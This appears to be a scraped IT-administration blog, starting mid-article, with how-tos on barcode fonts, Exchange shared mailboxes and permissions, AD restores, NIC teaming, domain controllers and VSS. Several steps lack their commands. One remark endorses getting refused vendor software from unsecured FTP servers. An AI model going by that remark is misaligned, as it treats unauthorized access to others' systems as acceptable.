to font 3-OF-9. • that should do it! • -in FILEMAKER • create a field called INFO as text. • create a field called INFO_BARCODE as calculation. • create a calculation that concats the INFO field surrounded by asterisks ("*" & INFO & "*"). • put the fields on the layout. • on the INFO_BARCODE field, change the font to 3-OF-9. Code 128 Code128 is a little more challenging than Code39. You would want to use Code128 when you need a compact barcode in a small space where Code39 will not fit. The challenging item with Code128 is that you need to translate what you want in a barcode into a barcode-string that contains accent letters. • -install the Code128 font here: http://www.dafont.com/code-128.font ([c] GRANDZABU v1.2 - 2003) • -install the font. • -reboot the computer (this is required). • -go to an online barcode-string-builder, here: http://www.jtbarton.com/Barcodes/BarcodeStringBuilderExample.aspx • -type what you want barcoded. • -click TO CODE 128 • -in WORD: • paste in the results. • change the font to CODE-128. • that should do it! • -in EXCEL: • -in FILEMAKER • download the FILEMAKER plugin here: http://downloads.idautomation.com/IDAutomationFMPlugin.zip • unzip the download. • close FILEMAKER. • copy the plugin file called IDAutomation.fmx and paste it in C:\Program Files\FileMaker\FileMaker Pro\Extensions (adjust the path to your version accordingly). • open FILEMAKER. • create a field called INFO as text. • create a field called INFO_BARCODE as calculation. • create a calculation that returns the INFO field as a barcode string. Use the custom function like so: IDAu_Code128( INFO ) • the result should be calculated as TEXT (not NUMBER). • put the fields on the layout. • click FORMAT > FONTS > CONFIGURE/MORE-FONTS (at the top menu). • find CODE-128 (on the left-hand column). • click MOVE. • click OK. • select the INFO_BARCODE field. • hold CTRL and ALT keys (on your keyboard). • select the font to Code-128 (at the top). • that should do it! NOTES: For whatever reason, I struggled do this for days. Again, I found a bunch of misinformation or confusing documents that lead me astray. Even different/newer versions of the fonts were red herrings and did not produce correct results. With the correct fonts, installed correctly, with the correct plugins, installed correctly, with the correct calculations, calculating correctly and the fonts configured correctly, I was finally able to do this. Exchange 2013 Shared Mailbox Background A mailbox is a typical account. You have John Doe. He has an account. His account is a mailbox account. The account is This e-mail address is being protected from spambots. You need JavaScript enabled to view it . Options John works with others doing proposals. What are the options? 1. pseudonym 2. group-account 3. separate account 4. shared mailbox 5. outside system Option 1 - Pseudonym (What you start out doing) 1-We can setup a pseudonym/fake-account/vanity-account. No matter what you call it, the idea is the same. It is an email address that automatically goes a real account. For example: This e-mail address is being protected from spambots. You need JavaScript enabled to view it automatically goes to the inbox of John Doe. This is great if only one person is responsible. But as the team grows, this becomes cumbersome. Option 2 - Group Account (What you graduate to) 2-We can setup a group-account. This is similar to above but the email goes to more than one person. For example: This e-mail address is being protected from spambots. You need JavaScript enabled to view it automatically goes to the INBOX of John Done and Jane Doe. This is great if it is a small team. The problem becomes, not everyone on the group know if a response was sent. Also folder organization is different for everyone on the group. You want everyone to have the same info, and see the same responses, then see further on. Option 3 - Separate Account (What you shouldn't do) 3-We can setup a separate account. This is a typical account but instead of assigning it to one person, you give the username/password to a group of users. For example: This e-mail address is being protected from spambots. You need JavaScript enabled to view it has its own inbox and several users connect to it through way of username/password. NOTE: While this seems like a good idea, years of experience says that this is a bad, bad, bad idea. Mainly because years on down the line, you can't find out who is responsible for the account. When you check the account it has a bunch of email in the inbox that no one has checked for years. I have witnessed this countless times in many clients. Kindly convince them to do it another way or just agree with them and set it up another way. The end result will be the same as below. Option 4 - Shared Mailbox (What you'll be required to do) 4-We can setup a shared mailbox. A shared mailbox is very similar to a separate account. The difference is that rather than handing out a username/password and letting them connect to it, you assign the account to users and it automatically shows in their folder structure on OUTLOOK as a separate INBOX. This way when five years pass, you can tell who is using the account. Here's how: set-mailbox foo.user -Type Shared Great! You are almost there. Now assign permissions of the people who need to use the shared-mailbox. The people will need both FULL-ACCESS and SEND-AS permissions to control the account and send messages. There is also a SEND-ON-BEHALF option available. NOTE: -the FULL-ACCESS permission is an EXCHANGE permission (add-mailboxpermission/set-mailboxpermission/get-mailboxpermission/remove-mailboxpermission). -the SEND-ON-BEHALF permission is an EXCHANGE key property (set-mailbox foo.user -GrantSendOnBehalfTo/get-mailbox foo.user |select GrantSendOnBehalfTo). -the SEND-AS permission is an AD permission (Add-ADPermission/get-adpermission foo.user -ExtendedRights Send-As -user user1). Here's how to add the FULL-ACCESS and the SEND-AS permissions: Add-MailboxPermission foo.user -User user1 -AccessRights FullAccess -InheritanceType All | Add-ADPermission -Identity "foo user" -User user1 -ExtendedRights "Send As" You may have to fiddle around with the add-adpermission command as it want the AD name like this, "FirstName LastName" (not the DISPLAY-NAME or ALIAS). ANOTHER NOTE: -the command does not accept multiple values for the users. Your options are to create a group & run the command on the group (hint: do not do this), run the command separately for each user wanting access (hint: do this if there's a handful), run the command using a txt file (hint: do this if there's a bunch) or use the EAC/ECP. You are doing great! That should just about do it. Automapping Issues But there's one more item to cover; AUTOMAPPING. AUTOMAPPING automatically shows the shared-mailbox to show in Outlook. This way, users do not have to manually add the account to their OUTLOOK... the shared-account automatically shows. This saves a bunch of hassle trying to get everyone to use a second account and it prevents dreaded OUTLOOK problems. Adding the permissions above will automatically turn AUTOMAPPING on. There should be no further steps. However, what happens if the shared-account doesn't show in OUTLOOK? What then? Well, this seems to be an issue many run into for various reasons. So let's cover some of them. First, there is a way to set the AUTOMAPPING off so that you can add the account manually: Add-MailboxPermission foo.user -User user1 -AccessRights FullAccess -InheritanceType All -automapping$false

To check AUTOMAP, you have to use the Get-ADuser command (not an EXCHANGE command):

This command will show a list of accounts. If the account is in the list, then AUTOMAPPING is turned on for that account.

Second, AUTOMAPPING won't work for Organization-Managment-Administrators. This is because this group already has mailboxperissions set and it automatically includes a DENY (or DENY: True). DENY takes priority over ALLOW. There are ways to get around this but it is outside the scope of this article.

Third, AUTOMAPPING doesn't work if DNS is incorrect/not-working-the-way-that-makes-OUTLOOK-happy. For whatever reason, AUTOMAPPING works fine for locations where we have a flat domain structure (everyone is on the same domain). It doesn't work when we have separate domains (ie local computer domain is remotedomain.tld and email domain is emaildomain.tld). Again, troubleshooting this is outside the scope of this article.

Fourth, wait. For whatever reason sometimes it takes a few hours to show. Give it 24 hours before sounding the alarm.

So putting it all together.

See the FULL-ACCESS permissions:

get-mailboxpermission foo.user |select user,accessrights,deny,inheritancetype

See the SEND-AS permissions:

See the AUTOMAPPING value:

That's it! Go home. You're done for the day.

Outlook Web Access and Shared Mailboxes

Outlook Web Access (OWA) will not automatically map shared mailboxes the same way that the OUTLOOK app does.You will have to manually add the shared mailbox.

-right-click your name (on the left-hand side).
-click on the name that shows.
-the account will show on the left-hand side.

Sent Items with Shared Mailboxes

Sent items automatically go in the SENT folder of the delegate (the person accessing the shared mailbox) and not the shared mailbox. Some people do not like this. So there is a registry edit you can do to put the sent message in the shared mailbox sent folder instead:

echo y | reg add "HKCU\Software\Microsoft\Office\[version]\Outlook\Preferences" /v DelegateSentItemsStyle /t REG_DWORD /d 00000001

NOTE: [version] is:
OUTLOOK-2010 = 14.0
OUTLOOK-2013 = 15.0
OUTLOOK-2016 = 16.0

NOTE-2: Here's a really good article:
http://windowsitpro.com/office-365/using-shared-mailboxes-office-365

Deleted Items with Shared Mailboxes

Same applies for the deleted items. Here's the registry edit you can use to put the deleted messages in the shared mailbox deleted folder:

echo y | reg add "HKCU\Software\Microsoft\Office\[version]\Outlook\Options\General" /v DelegateWastebasketStyle /t REG_DWORD /d 00000004

Option 5 - Outside System (What you should do. Hint: pick this one!)

5-The other option is to use an outside system. A customer relationship management tool or CRM. Something like Salesforce, HighRise, Zendesk-Inbox, etc (I'm sure there are others). The reason you do this is because the goal of this situation is to work together and consolidate items down to one spot. Teams try to solve this through email because that is what they are used to using as individuals. But teams need to work together.

Email is communication. Email is not issue-tracking, customer-tracking, proposal-tracking. Teams "feel" like there's a lot going on but when you look a the actual issues/customers/proposals on hand, there may not be that many. There's a lot of motion but very little movement down field.

These systems track the issues/proposals and consolidate all communication down to those issues. Suddenly, 100 emails boil down to 7 issues with a status (such as PENDING or 80%) and an assignment so you can see who (individual or team) is assigned to the issue/proposal.

Initially, you can assign issues/leads/proposals and track them, keeping the communication/email with the lead.

Eventually, you can capture metrics such as win/loss and view a pipeline of what may be coming in the near future.

Here are some tools to consider:

Sometimes if you don't need a CRM just a simple solution, Zendesk-Inbox might be a good fit. As of this writing it is in beta.

Quick Tip: See Remote Desktop Connections

Quick Tip: See Remote Desktop Connections

To see remote desktop connections (RDP connections):

-type: query user

It will show the connection and the idle time. This way if you are sharing a username, you can see if the account has been idle so you can connect without disrupting the other person.

HOW WE GOT HERE

THEM: I get a "Windows Security" login when I try to setup Outlook. It should just pick up all the settings automatically through autodiscover after I type in the email address and the password.

ME: Who cares. Everything is working. Type it in twice and move on with life.

THEM: It shouldn't be this way. It wasn't this way at my last place. We just typed in the email address and password and everything automatically worked.

ME: Sigh. I'll look into it.

OUTLOOK ANYWHERE OPTIONS (RPC over HTTP)

Well I'm glad I did look into it. From my other articles, the fine tuning of an MS EXCHANGE system is what makes it powerful as well as difficult.

So why is OUTLOOK ANYWHERE involved? Because all versions of OUTLOOK starting with OUTLOOK 2013 communicate through OUTLOOK ANYWHERE configuration (aka RPC over HTTP).

In this instance, EXCHANGE can change the way OUTLOOK talks to it. There are three options:

• BASIC: username and password is required while attempting communication with Exchange.
• NTLM: the current Windows user information on the client computer is supplied through cryptography communication. If the communication fails, a prompt for the username and password is required. In theory, if the computer is joined to the domain, a username and password is not needed.
• NEGOTIATE: kinda like the same thing as NTLM except it uses a more updated version.

In addition to these options, EXCHANGE can have different setting for outside the office or inside the office.

By default, EXCHANGE 2016 uses NEGOTIATE for outside the office and NTLM for inside the office.

HOW TO CHANGE OUTLOOK ANYWHERE SETTINGS

To see all the current settings:

Get-outlookanywhere |fl

To see the current settings we are interested in:

To set the settings to the default if they have been changed:

Set-OutlookAnywhere -identity "rpc (Default Web Site)" -SSLOffloading $true -InternalClientAuthenticationMethod NTLM -ExternalClientAuthenticationMethod Negotiate -IISAuthenticationMethods Basic,NTLM,Negotiate NOTES What's interesting to me is that the builtin documentation claims there are more settings. To see the builtin documentation: help set-outlookanywhere -detailed To see the online documentation: https://technet.microsoft.com/en-us/library/bb123545(v=exchg.150).aspx They list out the settings as the following with no further info on the other options: Basic | Digest | Ntlm | Fba | WindowsIntegrated | LiveIdFba | LiveIdBasic | WSSecurity | Certificate | NegoEx | OAuth | Adfs | Kerberos | Negotiate | LiveIdNegotiate | Misconfigured Managing Exchange 2013 Groups Managing Exchange 2013 Groups Simplified System In a simplified logical system, there are the following: -user: a single individual. -group: more than one user. In addition, groups are universal in the company. A group is a group. There are no group types. A group can access resources and receive email. Windows Server In MS world, there are more options for fine-grain control. There is a security-group to access resources and a distribution-group to receive email. (For the curious, these are the only two types of groups, there are no other types of groups.) Let's begin, shall we. GET-DISTRIBUTIONGROUP To see all the distribution groups: Get-DistributionGroup |select PrimarySMTPAddress To see all the distribution groups that receive email from the outside world: Get-DistributionGroup | ? {$_.RequireSenderAuthenticationEnabled -eq $true} | select PrimarySMTPAddress To see all the distribution groups that receive email only from within the company: Get-DistributionGroup | ? {$_.RequireSenderAuthenticationEnabled -eq $false} | select PrimarySMTPAddress Great! Let's move on to the AD side of the system GET-ADGROUP But before we do, note that typically, using a command and "|fl" will let you see all the info. On get-adgroup command, it doesn't work. You have to use: To see all of the AD group properties: Get-ADGroup -identity "foo-group" -prop * Also note that the get-adgroup command uses the SAMACCOUNTNAME (it does not use the NAME or DISPLAYNAME as other commands). So if you have an ad-group with the name FOO-GROUP-NAME but the SAMACCOUNTNAME is FOO-GROUP-SAMACCOUNTNAME, you have to use the SAMACCOUNTNAME: Get-ADGroup -identity "foo-group-samaccountname" -prop * To see all the groups (both AD and distribution as all distribution groups are AD groups): Get-ADGroup -Filter * -Prop * |select name,samaccountname,mailnickname To see AD security-groups (groups without email addresses): Get-ADGroup -filter {GroupCategory -eq "Security"} |select name,samaccountname To see AD distribution-groups: Get-ADGroup -Filter 'GroupCategory -eq "Distribution"' -prop * |select name,samaccountname,mailnickname ISSUES Theoretically, this list should match the get-distributiongroup list from above. But you might notice that some distribution-groups that do not have email addresses. That's kinda strange. What gives? Sometimes the AD distribution-group does not have the necessary info in the database. Having this info is called mail-enabled. There's even a command just to handle this. To mail-enable a distribution group that needs it: Enable-DistributionGroup -Identity "foo-group" (NOTE: This will even work on security-groups.) Also, there are some items in the get-distributiongroup list from above that are not in the get-adgroup command above. What gives? Well because groups can be mail-enabled, it is possible for a security-group to be mail-enabled as well. To see AD security-groups with mail-enabled: Get-ADGroup -Filter 'GroupCategory -eq "Security"' -prop * |select name,mailnickname Finally as a last question, if both group-types (distribution and security) can be mail-enabled, what's the point of having group types? Good question. There isn't. It is the way the world works. Restore Deleted User in Active Directory Restore Deleted User in Active Directory • -click Start > Right click Command Prompt/PowerShell > Select Run as Administrator • -type: ldp • -press Enter • -click CONNECTION > CONNECT • -type in the server name: foo-dc1 (leave everything as default) • -click OK • -click CONNECTION > BIND • -bullet 'Bind As Currently Logged On User' • -click OK • -click VIEW > TREE • -select DC=domain-name-here,DC=tld(ie DC=daknetworks,DC=com) • -double-click CN=Deleted Objects,DC=domain-name-here,DC=tld (on the left hand side) A list of deleted objects will show on the left hand side and will look like this: CN=Foo User\0ADEL:d8dae83b-348c-4b48-af63-6ef9eb88b8e3,CN=Deleted Objects,DC=daknetworks,DC=com • -find the deleted user that was deleted. • -double-click on the user. • (the details of the user will show on the right-hand side) • -right-click on the user > Modify • -for ATTRIBUTES, type: isDeleted • -for OPERATION, bullet DELETE • -click ENTER Now we have to tell AD where to restore the user. • -for ATTRIBUTES, type: distinguishedName • -for VALUES, type the original DN of the object. • You can find the last-known distinguishedName by looking on the right-hand side. It will say "lastKnownParent". Simply add the user name before. For example: CN=foo user,OU=whatever,OU=wherever,OU=allUsers,DC=daknetworks,DC=com • -for OPERATION, bullet REPLACE • -click ENTER • -checkmark EXTENDED (lower-left). • -click RUN. The user is restored successfully to the OU you defined. You might have to re-add some info and re-enable the Exchange mailbox. Recover Deleted Items from Exchange 2013 | Recover Deleted Items from Outlook2013 | Recover Deleted Items from Outlook 2016 Recover Deleted Items from Exchange 2013 | Recover Deleted Items from Outlook2013 | Recover Deleted Items from Outlook 2016 DEFINITIONS DELETE - deletes the messages from the folder. Moves the messages into the DELETED-ITEMS folder (or the TRASH folder). RETENTION - the time that you can recover items even if the messages were permanently-deleted (or deleted from the DELETED-ITEMS folder). DISCOVERY Exchange 2013 will have a RETENTION time for permanently-deleted messages. This setting is on the MAILBOX-DATABASE and not on the MAILBOX or individual account. To see the settings, first find all the MAILBOX-DATABASEs names and their retention time: -get-mailboxdatabase |select Name,DeletedItemRetention It will spit out something like: Name DeletedItemRetention ---- -------------------- Mailbox A 14.00:00:00 Mailbox B 14.00:00:00 Mailbox C 14.00:00:00 Great! You know that you have 14 days to retrieve something that was deleted. SET RECOVERY If you need to set recovery on a MAILBOX-DATABASE to say 30 days or if a retention is not set and you need to set it: set-mailboxdatase "mailbox b" -DeletedItemRetention 30.00:00:00 (days.hours:minutes:seconds) RECOVER IN OUTLOOK 2013 | RECOVERY IN OUTLOOK 2016 -click DELETED-ITEMS (on the left-hand side). -click RECOVER-DELETED-ITEMS-FROM-SERVER (at the top). You should see a list of the messages from the last 2 weeks. -control-click to select the messages you want. -click OK to restore them. It should put them back into the folder where they went missing. RECOVER IN EXCHANGE 2016 If that's too much trouble for the person, then you can do it on their behalf in the EMS. This will put all the recovery items in the user's mailbox in a recovery-folder called 'foo.user.recovery': Search-Mailbox foo.user -SearchDumpsterOnly -TargetMailbox foo.user -TargetFolder foo.user.recovery -LogLevel Full And if you really want to search through the recovery items and restore them: Search-Mailbox foo.user -SearchQuery "sent: '04/10/17' AND from: 'foo.sender'" -TargetMailbox foo.user -TargetFolder "foo.user.recovery" -LogLevel Full Create a NIC Team, Create NIC Bond, Create Load-Balancing, LBFO, For Hyper-V Here's how to create a NIC Team/NIC Bond/Load-Balancing/LBFO setup. This setup is then used in a virtual machine enviroment for all the VM's to use. First update drivers to INTEL newest drivers v21.1. We will be using LBFO (LOADBALANCING-FAILOVER) which is built into Windows Server rather than INTEL ANS (Advanced Networking Services) which is built into the Intel driver. The reason for this is that ultimately there are too many issues if you do not use what is built into the Windows OS. Updates and other items will keep having trouble with INTEL ANS. Remove Existing Settings -remove static settings from existing nics. -remove virtual switch in Hyper-V. Establish New Settings in PowerShell -first, see the network adapters you have: get-netadapter -renamed nic1 to TeamNic1: rename-netadapter "Local Area Connection" "TeamNic1" -renamed nic2 to TeamNic2: rename-netadapter "Local Area Connection 2" "TeamNic2" -created nic team with name ManagementTeam: new-netlbfoteam -Name "ManagementTeam" -TeamMembers TeamNic1,TeamNic2 -TeamingMode SwitchIndependent -LoadBalancingAlgorithm TransportPorts -created virtualswitch called ConvergedNetSwitch: New-VMSwitch "ConvergedNetSwitch" -MinimumBandwidthMode weight -NetAdapterName "ManagementTeam" -click SERVER-MANAGER (the management gui in Windows Server that shows when you start the server) -click LOCAL-SERVER (on the left-hand side). -find NIC-TEAMING (at the top section) -click ENABLED (next to NIC-TEAMING) (a windows shows) -right-click on MANAGEMENTTEAM (lower-left) > click PROPERTIES -click ADDITIONAL-PROPERTIES (at the bottom). -set SWITCH-INDEPENDENT -set ADDRESS-HASH (if you set to the HYPER-V-PORT setting, each VM will be assigned to a specific NIC). -set STANDBY as NONE To Verify New Settings -type: get-VMSwitch |fl -here's my output: ComputerName : foo Name : ConvergedNetSwitch Id : d64482dc-d6d4-4b64-8d24-4105c1ef80a4 Notes : SwitchType : External AllowManagementOS : True NetAdapterInterfaceDescription : Microsoft Network Adapter Multiplexor Driver AvailableVMQueues : 63 NumberVmqAllocated : 3 IovEnabled : False IovVirtualFunctionCount : 0 IovVirtualFunctionsInUse : 0 IovQueuePairCount : 0 IovQueuePairsInUse : 0 AvailableIPSecSA : 2048 NumberIPSecSAAllocated : 0 BandwidthPercentage : 100 BandwidthReservationMode : Weight DefaultFlowMinimumBandwidthAbsolute : 0 DefaultFlowMinimumBandwidthWeight : 1 Extensions : {Microsoft NDIS Capture, Microsoft Windows Filtering Platform} IovSupport : False IovSupportReasons : {This network adapter does not support SR-IOV.} IsDeleted : False Start New Settings -rebooted to make sure it survives a reboot. NOTES ***To be clear, this is set for LOAD-BALANCING (not FAILOVER).*** We would need another NIC to enable failover. Simply add the NIC to the team. Then choose that NIC to be the STANDBY ADAPTER. A real team/bond requires configuration on the switchs (or more specifically on the switch ports) to create an EtherChannel. If you are to do this, make it easy on yourself and make certain all the switches are the same model. Then make certain all have the same OS before stacking. Once stacked, configure the EtherChannel. Outlook 2016 Calendar Sharing - "You Don't Have Permission To Create An Entry In This Folder" Outlook 2016 Calendar Sharing - "You Don't Have Permission To Create An Entry In This Folder" SCENARIO You try and share a calendar in Outlook 2016. When the person who has EDITOR accessrights adds the shared calendar to their Outlook, they get the following message: "You Don't Have Permission To Create An Entry In This Folder...." RESOLUTION There can be many reasons why this is happening. Ultimately it is a permission issue or a cache permission issue. 1-check to see if the calendar has the correct permissions. Show Calendar Permissions Get-MailboxFolderPermission foo.user:\calendar Add Calendar Permissions Add-MailboxFolderPermission foo.user:\calendar -User foo.user2 -AccessRights Editor The non-working mailbox calendar has the correct permissions and it still doesn't work. 2-temporarily change the primary smtp address on the shared account. Don't ask me why but I've witnessed that if the shared account ( This e-mail address is being protected from spambots. You need JavaScript enabled to view it ) changes the primary smtp email address domain ( This e-mail address is being protected from spambots. You need JavaScript enabled to view it ) sometimes the person trying to access the calendar can suddenly edit the calendar if they remove the calendar and add it back in. Here's how... On OUTLOOK where you are trying to access the shared calendar: -click CALENDAR (bottom-left). -find OTHER CALENDARS. -right-click on the calendar-name. -click DELETE CALENDAR (don't worry, this only removes the calendar. It doesn't actually delete the calendar). -close OUTLOOK. -change primary smtp via ECP (web interface) from This e-mail address is being protected from spambots. You need JavaScript enabled to view it to: This e-mail address is being protected from spambots. You need JavaScript enabled to view it -open OUTLOOK. -be sure address is updated in ADDRESS-BOOK (global-address-list). -click CALENDAR (bottom-left). -find OTHER CALENDARS. -right-click OTHER CALENDARS > ADD CALENDAR > OPEN SHARED CALENDAR. -type in the name of the person. -click OK. -wait about 10 seconds. WORKS WITH NEW DOMAIN!!! And can edit the calendar. -remove the shared calendar (same as above). -change primary smtp via ECP (web interface)from This e-mail address is being protected from spambots. You need JavaScript enabled to view it to: This e-mail address is being protected from spambots. You need JavaScript enabled to view it -added calendar (same as above). WORKS WITH ORIGINAL DOMAIN!!! And can edit the calendar. It is important to note that changing via Exchange Management Shell (EMS) did not work and resulted in the original error.$Set-Mailbox foo.user -PrimarySmtpAddress This e-mail address is being protected from spambots. You need JavaScript enabled to view it
$Add-MailboxFolderPermission foo.user:\calendar -User foo.user2 I'm not sure if this is an emailaddresses issue. Or a missing value in one of the keys that is changed in the ECP and not in the EMS. Or if it is a global-address cache issue. Or if it a GAL sync issue that takes time. All I can tell you is that I performed the steps above and it worked. Took me a good 30 hours or so to figure that out. In any event, I checked the following but nothing produced any meaningful results concerning this issue:$Get-mailboxpermission foo.user |fl
$Get-Mailbox foo.user| Select-Object -ExpandProperty EmailAddresses$Get-CalendarProcessing foo.user |fl
$Get-CASmailbox foo.user| fl 3-check the offlineaddressbook setting for the mailboxdatabase Somewhere along the line during initial install, a CU update or creation of a new mailboxdatabase, the OFFLINEADDRESS book key is blank/null. I think it would automatically default to the default address book but I really don't know. I haven't found any info that says have a null value is bad but most info I see says to set it for all mailboxdatabases. Find the name of the OFFLINE ADDRESS BOOK: Get-OfflineAddressBook |select name Now set the MAILBOXDATABASE to use that name: Get-Mailboxdatabase | Set-MailboxDatabase -OfflineAddressBook “Default Offline Address Book (Ex2013)” NOTES Calendar Permissions can be set individually or by role. The DEFAULT permissions are: ReadItems, CreateItems, EditOwnedItems, EditAllItems, CreateSubfolders, FolderVisible Or another way to view the DEFAULT role is like this (the minus is what the role doesn't have): ReadItems CreateItems EditOwnedItems EditAllItems CreateSubfolders FolderVisible -DeleteOwnedItems -DeleteAllItems -FolderOwner -FolderContact The EDITOR role permissions are: ReadItems, CreateItems, EditOwnedItems, EditAllItems, FolderVisible, DeleteOwnedItems, DeleteAllItems Or another way to view the EDITOR role is like this (the minus is what the role doesn't have): ReadItems CreateItems EditOwnedItems EditAllItems -createsubfolders FolderVisible DeleteOwnedItems DeleteAllItems -FolderOwner -FolderContact GET PERMISSION TO MAILBOX Sometimes getting the permissions to the mailbox helps: Get-MailboxPermission foo.user GET PERMISSION TO MAILBOX THAT IS ANOTHER USER Sometimes it helps to see who else has permission to the mailbox: Get-MailboxPermission foo.user |? {$_.IsInherited -ne "true" -and $_.User -ne "NT AUTHORITY\SELF"} CHANGE PERMISSION TO MAILBOX Sometimes you need to change permissions on the mailbox: Set-MailboxPermission foo.user -user foo.user2 -AccessRights FullAccess ADD PERMISSION TO MAILBOX Add-MailboxPermission foo.user -user foo.user2 -AccessRights FullAccess REMOVE PERMISSION TO MAILBOX remove-MailboxPermission foo.user -user foo.user2 -AccessRights FullAccess SEE COMPLETE FOLDER STRUCTURE Sometimes, seeing the complete folder structure of the mailbox helps: get-MailboxFolder foo.user:\ -recurse GET THE CALENDAR NAME Sometimes getting the calendar name helps because it is changed from another language: Get-MailboxFolderStatistics foo.user |where-object {$_.FolderType -eq "Calendar" } |select-Object Name

Sometimes you need to add permissions to the calendar:
Add-MailboxFolderPermission foo.user:\calendar -User foo.user2 -AccessRights Editor

REMOVE CALENDAR FOLDER PERMISSIONS

Sometimes you need to remove permissions to the calendar:
remove-MailboxFolderPermission -Identity foo.user:\calendar -User foo.user2

SEE MAILBOXES IN ORGANIZATIONAL UNIT

Sometimes you need to see the email in a single AD OU:
get-mailbox -OrganizationalUnit "ou=where-ever,ou=whatever-users,dc=domain,dc=tld" -resultsize unlimited |get-mailboxstatistics |ft DisplayName,TotalItemSize,Itemcount

REMOVE CACHE SHARED CALENDAR FOLDERS IN OUTLOOK 2016:

Sometimes working off of cached shared calendar folders causes an issue and you need to remove the cache folders from OUTLOOK 2016:
-account-settings > email  > change > more-settings > advanced
-restart OUTLOOK

REMOVE CACHE FOLDERS IN OUTLOOK 2016:

Sometimes working off of cached folders causes an issue and you need to remove all the cache folders from OUTLOOK 2016:
-account-settings > email  > change
-uncheck "Use Cached Exchange Mode"
-click NEXT > FINISHED
-restart OUTLOOK

Windows Server 2012 Connect Branch Office to HQ Domain And Replicate Domain And Replicate DNS

Windows Server 2012 Connect Branch Office to HQ Domain And Replicate Domain And Replicate DNS

I had new 10K server and wanted to test out before making changes. The goal is to turn it into a VM. Test out connecting to the HQ domain and replicate the domain and dns. In this situation the branch office already had a domain. The location was purchased by HQ and needed to roll into the HQ domain.

Couple of notes before we begin:
-keep your domain flat. If you can, do NOT do subdomains, trusts, etc. It's too much of a pain later on. Keep it simple.
-you can have 2 domains on the same network (just not 2 DHCP servers).

CREATE VIRTUAL MACHINE

HYPER-V is included in WINDOWS-10. So all we have to do is create a new VHDX from the existing SDD that came with the server.

-connect SDD to WINDOWS-10 via USB caddy.
-created server-2012r2 vm with DISK2VHD (you only need the main partition).
-started HYPER-V
-created new VM (do not import, etc).
-attached newly created VHDX, no-network, 4 processors, 10GB ram.
-booted for first time.
-shutdown.
-create VSWITCH external-network & allow-management-operating-system-to-share-this-network-adapter (no vlan id).
-attached VSWITCH to VM.

-on hq ad server: ad-sites-services > subnets > create subnets-for-branch-office & attach to branch-office
-on hq ad server: ad-sites-services > inter-site-transports > ip > create new > hq/branch > 15 mins

JOIN BRANCH OFFICE SERVER TO HQ DOMAIN

Simple enough but if you've never done it before you might be thinking there's something more to it. There isn't.

-start VM
-change dns to dns at hq
-join domain
-restart

PROMOTE BRANCH OFFICE SERVER AS DOMAIN CONTROLLER

-click NEXT > NEXT > NEXT
-click ACTIVE-DIRECTORY-DOMAIN-SERVICES
-let it go through its setup.
-click promote to DOMAIN-CONTROLLER (upper-right flag)
-select DNS SERVER & GC (global catalog)
-except defaults until INSTALL.
-click INSTALL
-wait
-server reboots

REPLICATE BRANCH OFFICE SERVER DOMAIN CONTROLLER

-check USERS&COMPUTERS to see if in DOMAIN-CONTROLLERS
-check SITES&SERVICES
-view all servers are correct.
-click NTDS SETTINGS
-right-click right-panel
-click REPLICATE-NOW
-cycle through all NTDS SETTINGS
-right-click NTDS-SETTINGS > ALL-TASKS > CHECK-REPLICATION-TOPOLOGY
-cycle through all NTDS SETTINGS
(on the new server, the largest delta is 'unknown')
-click NTDS SETTINGS
-right-click right-panel
-click REPLICATE-NOW
(on the new server, notice the time is now a few seconds)

High-five!!!

NOTES:

CTS2600

I have a storage array with 12 3.5" drives. It's a little older but it works. It has an LSI sticker on it.

I pop in some hard drives, plug in the Ethernet connection and power it on.

Now, how do I control it? There is no monitor connection.

So, I look at the DHCP find the ip address. I put the ip address in the browser but nothing shows.

With a tool, I see that it is showing as a NETAPP device. Hmmm... I thought it was LSI but OK.

I do a little googling and find that NETAPP purchased the storage array division from LSI.

So I go to the NETAPP (who acquired LSI) web site for support. I see that it needs a program called SANTRCITY. SANTRICITY isn't offered as a free download, I have to register for it.

No problem. I provide the SERIAL-NUMBER on the device and wait.

I receive a message from NETAPP stating that they won't provide support since they made it for someone else who branded it as their own. Also known as an OEM. It even states in their LSI acquire document:
http://mysupport.netapp.com/NOW/public/apbu/oemcp/NetApp_Engenio_Support_Integration_FAQ.pdf

But who is the OEM? I don't know. There are no markings on the device. This OEM is supposed to provide SANTRICITY or a rebrand of the app to control the storage device.

I find out that the device is actually an LSI CTS2600. The LSI CTS2600 was made for DELL as the POWERVAULT MD3200. I download the DELL software but it doesn't find the array that is booted. I try a couple more times without success.

I finally hear back from NETAPP that the OEM is BLUEARC. Great! A little more googling and I see that it is a BlueArc Mercury 50.

BLUEARC was purchased by HITACHI. Humph... Siging up for the access to Hitachi support web site.

The BLUEARC software was incorporated into HITACHI COMMAND SUITE.

Support writes back that there is no support contract on the device so they will not provide any help.

Now I have a 20K SAN that boots and physically works but I have no way to control it or manage it. In other words, I have a 20K boat anchor.

Good thing there are FTP sites with admins that don't lock them up :-)

System Volume Information Folder Size

If you are "missing" free space, and only have a few GB left when you should have many GB left (or TB), the culprit could likely be:

• -permission issue. You cannot see the size of a folder if you do not have read permissions to access the folder.

You can see if there are SHADOWS by following the instructions in the previous post. One item that VSSADMIN and DISKSHADOW will not show is the size of the SHADOW. Bummer.

The Windows OS saves these SHADOWS in the SYSTEM VOLUME INFORMATION folder. For various reasons, a typical administrator does not have permissions to that folder. This causes an issue because you cannot know the size of the folder through EXPLORER.

So how do you know the size of the SYSTEM VOLUME INFORMATION folder? Here's how using robocopy:

• robocopy "c:\System Volume Information" c:\dummy /l /xj /e /nfl /ndl /njh /r:0 /b

For most other items, WINDIRSTAT will show you the way.

A shadow is copy of file or a volume. This can be done even while the file is in use. The proper name for this is Volume Snapshot Service  or Volume Shadow Copy Service or VSS. And it works at a block level (rather than a file level).

There are a couple of parts to this but the heart of the technology is the VOLUME SHADOW COPY SERVICE which performs the actual copy.

The transfer of the data is called a PROVIDER. While Windows comes with its own PROVIDER, other software companies can create their own providers. An example of a built-in PROVIDER is SYSTEM RESTORE or PREVIOUS VERSIONS for a file or folder. An example of an outside software company is SHADOWPROTECT. While SHADOWPROTECT is an outside company, it still relies on VSS to create the shadow on its behalf. SHADOWPROTECT does not create its own shadow.

The shadows are traditionally managed by VSSADMIN. Here's how to show all PROVIDERS in either powershell or command-line:

And here's how to show the SHADOWS:

And here's how to show the SHADOW storage:

VSSADMIN is not the only tool. Another tool gives more info. That is DISKSHADOW. DISKSHADOW is a interactive command interpreter like DISKPART. What I've found is that DISKSHADOW is a more accurate and more powerful tool.

Here's how to enter DISKSHADOW interactive:

Here's how to show all PROVIDERS:

Here's how to show all SHADOWS:

